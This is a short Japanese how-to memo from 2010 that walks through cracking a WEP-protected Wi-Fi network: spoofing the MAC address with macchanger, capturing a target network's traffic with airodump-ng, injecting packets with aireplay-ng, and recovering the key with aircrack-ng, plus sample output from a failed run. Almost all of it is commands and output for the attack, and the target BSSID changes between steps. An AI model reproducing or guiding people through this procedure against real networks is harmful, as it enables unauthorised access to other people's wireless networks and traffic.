rootユーザにて実施する。
準備
# apt-get install macchanger
# apt-get install aircrack-ng
------------------------------------------------------------------------------------------------
# airmon-ng stop wlan0
# ifconfig wlan0 down
# ifconfig wlan0 down
# airmon-ng start wlan0
# macchanger --mac 00:11:22:33:44:55 wlan0
# airodump-ng wlan0
表示された一覧からWEBキー通信のSSIDのMacアドレスとチャンネル番号を以下のコマンドで入力する。
# airodump-ng -c 7 -w wifi --bssid 0E:24:A5:B8:42:20 wlan0
※ -c 7 >>> チャンネル番号
--bssid 0E:24:A5:B8:42:20 >>>>> BSSID名
-w wifi >>>> ダンプファイル作成ファイル名
別Terminalを起動して・・・
# aireplay-ng -1 10 -a 0E:24:A5:B8:42:20 -h 00:11:22:33:44:55 mon0
Association successful :-) (AID: 1) <--- これが表示されればOK
連続してパケット送信する場合は・・・
# aireplay-ng -3 -b 0E:24:A5:B8:42:20 -h 00:11:22:33:44:55 wlan0 <--- mon0でもOKなのか?
別Terminalを起動して・・・
# aircrack-ng -b 00:16:01:04:78:0E wifi-01.cap
ここで、
Aircrack-ng 1.0
[00:00:06] Tested 134065 keys (got 16673 IVs)
KB depth byte(vote)
0 10/ 11 86(20736) 35(20480) CF(20480) D6(20480) 16(20224) 25(20224) 54(20224)
1 16/ 1 95(19968) 3D(19712) 94(19712) DA(19712) E3(19712) 17(19456) 1A(19456)
2 6/ 20 A3(20992) E4(20480) FF(20480) 12(20224) B6(20224) 11(19968) 19(19968)
3 11/ 23 E8(20736) 3E(20480) 63(20480) 98(20480) 11(20224) 22(20224) 47(20224)
4 11/ 4 F6(20736) 0E(20224) 67(20224) 8E(20224) 92(20224) A7(20224) BD(20224)
Failed. Next try with 20000 IVs.
戸表示された場合は解析に失倍。上の「[00:00:06] Tested 134065 keys (got 16673 IVs)」の 16673 は airodump-ngで表示されている「# Data」の容量です。
もう少し、「# Data」の容量が増えてから再度、解析コマンドを実行して下さい。
最終更新:2010年09月10日 19:02
